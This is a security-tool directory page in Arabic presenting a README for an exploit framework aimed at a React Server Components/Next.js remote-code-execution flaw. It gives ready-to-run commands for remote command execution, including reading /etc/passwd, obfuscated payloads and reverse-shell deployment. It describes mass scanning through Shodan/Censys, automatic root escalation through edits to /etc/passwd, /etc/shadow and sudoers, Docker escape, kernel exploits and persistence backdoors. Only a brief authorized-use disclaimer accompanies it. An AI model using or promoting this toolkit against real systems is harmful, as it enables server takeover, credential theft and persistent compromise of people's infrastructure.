Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
أدوات/GitHubGitHub/cerberusmrxi/cerberus-react2shell-scanner-exploit
أطر اختبار الاختراقتصعيد الامتيازاتماسحات الثغرات الأمنيةأطر الاستغلالشيل كوداستغلال تطبيقات الويبما بعد الاستغلالالقيادة والسيطرةالتعلم والتعليم

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →

حول

الفريق الأحمر
تطوير الحمولات
مختبرات وتدريب عملي
GitHubcerberusmrxi/cerberus-react2shell-scanner-exploit

Cerberus-React2Shell-Scanner-Exploit

عرض المستودع
21منذ شهر واحدلم تتم المراجعة بعد

مجموعة أدوات استغلال متطورة لـ CVE-2025-55182 (ثغرة تنفيذ الأوامر في مكونات خادم React). حمولات متعددة الأشكال غير متزامنة، تجاوز متقدم لجدار الحماية وشبكة توصيل المحتوى (WAF/CDN)، تدوير الوكيل، مسح جماعي عبر Shodan/Censys، اختراق تلقائي مع قذائف عكسية، قوالب Nuclei، مختبر K8s ولوحة تحكم C2. من تأليف Sudeepa Wanigarathna – مخصصة فقط لاختبار الاختراق والاختبارات الأمنية المصرح بها.

مشاركة

Cerberus React2Shell - إطار استغلال مسلح

root@kitploit:~
  ██████╗ ███████╗██████╗ ██████╗ ███████╗██████╗ ██╗   ██╗
 ██╔════╝ ██╔════╝██╔══██╗██╔══██╗██╔════╝██╔══██╗██║   ██║
 ██║      █████╗  ██████╔╝██████╔╝█████╗  ██████╔╝██║   ██║
 ██║      ██╔══╝  ██╔══██╗██╔══██╗██╔══╝  ██╔══██╗██║   ██║
 ╚██████╗ ███████╗██║  ██║██████╔╝███████╗██║  ██║╚██████╔╝
  ╚═════╝ ╚══════╝╚═╝  ╚═╝╚═════╝ ╚══════╝╚═╝  ╚═╝ ╚═════╝
  
         React2Shell Exploitation Framework v1.0
              Author: Sudeepa Wanigarathna

🎯 نظرة عامة

إطار استغلال احترافي لثغرة RCE في Next.js Server Actions (React2Shell). يوضح سلسلة الهجوم الكاملة من الوصول الأولي إلى تصعيد الصلاحيات إلى الجذر.

القدرات:

  • ✅ كشف تلقائي للثغرات
  • ✅ تنفيذ أكواد عن بُعد (RCE)
  • ✅ وصول تفاعلي للشل
  • ✅ تعداد أنظمة لينكس
  • ✅ تصعيد صلاحيات تلقائي
  • ✅ نشر شل عكسي
  • ✅ رفع/تنزيل الملفات
  • ✅ إظهار الوصول إلى الجذر

🚀 بداية سريعة

RCE أساسي

root@kitploit:~
# فحص الثغرة
python3 react2shell_exploit.py --target http://127.0.0.1:3000 --check

# تنفيذ أمر
python3 react2shell_exploit.py --target http://127.0.0.1:3000 --cmd "id"

شل تفاعلية

root@kitploit:~
python3 interactive_shell.py --target http://127.0.0.1:3000

سلسلة هجوم كاملة تلقائية

root@kitploit:~
# استغلال كامل: RCE → تعداد → وصول إلى الجذر
python3 demo_exploit.py --target http://127.0.0.1:3000 --auto-root

📁 هيكل الإطار

root@kitploit:~
Cerberus-React2Shell-Hades/
├── react2shell_exploit.py      # محرك الاستغلال الأساسي (400+ سطر)
├── demo_exploit.py              # سلسلة هجوم تلقائية (290+ سطر)
├── interactive_shell.py         # شل تفاعلية (280+ سطر)
├── reverse_shell_handler.py     # مستمع الشل العكسي (180+ سطر)
├── post_exploit/
│   ├── linux_enum.py           # تعداد النظام (330+ سطر)
│   ├── priv_esc.py             # تصعيد الصلاحيات (320+ سطر)
│   └── __init__.py
├── EXPLOITATION_GUIDE.md        # توثيق الاستخدام الكامل
├── QUICKSTART.md                # مرجع سريع
└── BANNER.txt

🔥 المميزات

محرك الاستغلال الأساسي

  • اكتشاف Action ID: استخراج تلقائي من حزم JavaScript
  • حمولات متعددة: execSync, spawn, eval, mainModule بإصدارات مختلفة
  • استخراج المخرجات: تحليل مخرجات الأوامر من رسائل الخطأ
  • تجاوز WAF: تقنيات إخفاء الحمولات

ما بعد الاستغلال

  • تعداد لينكس: ملفات SUID/SGID، مسارات قابلة للكتابة، مهام cron، إصدار النواة
  • تصعيد الصلاحيات: GTFOBins، ملفات /etc قابلة للكتابة، هروب Docker، القدرات
  • عمليات الملفات: رفع/تنزيل بتشفير base64
  • الثبات: طرق متعددة للباب الخلفي

أدوات تفاعلية

  • شل تفاعلية: تنفيذ أوامر فوري مع أوامر مدمجة
  • شل عكسي: أنواع متعددة من الشل (bash, python, nc, perl)
  • وضع العرض التوضيحي: عرض تلقائي من 6 خطوات

📖 أمثلة الاستخدام

1. الأوامر الأساسية

root@kitploit:~
# فحص الثغرة
python3 react2shell_exploit.py --target http://127.0.0.1:3000 --check

# تنفيذ أوامر
python3 react2shell_exploit.py --target http://127.0.0.1:3000 --cmd "whoami"
python3 react2shell_exploit.py --target http://127.0.0.1:3000 --cmd "cat /etc/passwd"

# إصدارات حمولة مختلفة
python3 react2shell_exploit.py --target http://127.0.0.1:3000 --cmd "id" --variant spawn

# مع الإخفاء
python3 react2shell_exploit.py --target http://127.0.0.1:3000 --cmd "id" --obfuscate

2. الشل التفاعلية

root@kitploit:~
# تشغيل الشل
python3 interactive_shell.py --target http://127.0.0.1:3000

# الأوامر المتاحة:
# - execute <cmd>        : تنفيذ أمر شل
# - enum                 : تشغيل تعداد كامل
# - escalate             : محاولة تصعيد الصلاحيات
# - upload <local> <remote>  : رفع ملف
# - download <remote> <local>: تنزيل ملف
# - shell <lhost> <lport>: نشر شل عكسي
# - info                 : عرض معلومات الجلسة
# - exit                 : خروج

3. الشل العكسي

root@kitploit:~
# الطرفية 1: تشغيل المستمع
python3 reverse_shell_handler.py --lport 4444

# الطرفية 2: نشر الشل
python3 react2shell_exploit.py --target http://127.0.0.1:3000 \
  --revshell --lhost 127.0.0.1 --lport 4444 --shell-type bash

4. العرض التوضيحي التلقائي

root@kitploit:~
# السلسلة الكاملة: اكتشاف → RCE → تعداد → جذر
python3 demo_exploit.py --target http://127.0.0.1:3000 --auto-root

🎯 سلسلة الهجوم

ينفذ الإطار سلسلة استغلال كاملة من 6 خطوات:

  1. اكتشاف - استخراج معرفات Server Actions من حزم JavaScript
  2. استغلال - العثور على Action ID يعمل وتحقيق RCE
  3. تحقق - تأكيد تنفيذ الأكواد باستخدام الأمر id
  4. تعداد - جمع معلومات النظام، ملفات SUID، المسارات القابلة للكتابة
  5. تصعيد - استغلال نواقل تصعيد الصلاحيات تلقائيًا
  6. عرض - إثبات الوصول إلى الجذر عبر قراءة /etc/shadow وسرد محتويات /root

🛡️ تقنيات تصعيد الصلاحيات

الطرق المطبقة

  1. ملفات SUID (GTFOBins)

    • find, vim, python, perl, bash, awk, sed, less, more, nmap
  2. ملفات /etc قابلة للكتابة

    • /etc/passwd - إضافة مستخدم جذر جديد
    • /etc/shadow - مسح كلمة مرور الجذر
    • /etc/sudoers - منح صلاحيات sudo بدون كلمة مرور
  3. هروب Docker

    • استغلال مقبس Docker القابل للوصول
    • اختراق الحاويات المتميزة
  4. استغلال النواة

    • DirtyCow (CVE-2016-5195)
    • Dirty Pipe (CVE-2022-0847)
    • PwnKit (CVE-2021-4034)
  5. قدرات لينكس

    • استغلال CAP_SETUID, CAP_DAC_OVERRIDE

📊 إحصائيات

  • إجمالي أسطر الكود: 1,800+
  • الوحدات: 8
  • تقنيات تصعيد الصلاحيات: 5
  • أنواع الحمولات: 4
  • أنواع الشل: 4 (bash, python, nc, perl)

⚙️ المتطلبات

root@kitploit:~
pip install -r requirements.txt

التبعيات:

  • requests
  • colorama

📚 التوثيق

  • EXPLOITATION_GUIDE.md - دليل الاستخدام الكامل مع الأمثلة
  • QUICKSTART.md - مرجع سريع للأوامر الشائعة

⚠️ إخلاء مسؤولية

تحذير: هذه الأداة مخصصة لاختبارات الأمان المصرح بها فقط. الوصول غير المصرح به إلى أنظمة الحاسوب غير قانوني. استخدم فقط على الأنظمة التي تملكها أو لديك إذن كتابي صريح لاختبارها.

المؤلف غير مسؤول عن أي استخدام خاطئ لهذه الأداة. الاستخدام على مسؤوليتك الخاصة.

🎓 الغرض التعليمي

صمم هذا الإطار من أجل:

  • الباحثين في مجال الأمن الذين يدرسون ثغرات Next.js
  • مختبرين الاختراق الحاصلين على إذن
  • التدريب الأمني وتحديات CTF
  • أبحاث الثغرات في بيئات مختبرية خاضعة للرقابة

📄 الترخيص

MIT License (لأغراض تعليمية فقط)

👤 المؤلف

Sudeepa Wanigarathna

  • خبير في تطوير الاستغلال
  • باحث أمني
  • مختبر اختراق

الإصدار: 1.0
آخر تحديث: ديسمبر 2025
حالة المختبر: http://127.0.0.1:3000 (قيد التشغيل)

للحصول على تعليمات استخدام مفصلة، راجع EXPLOITATION_GUIDE.md

تنزيل الأداة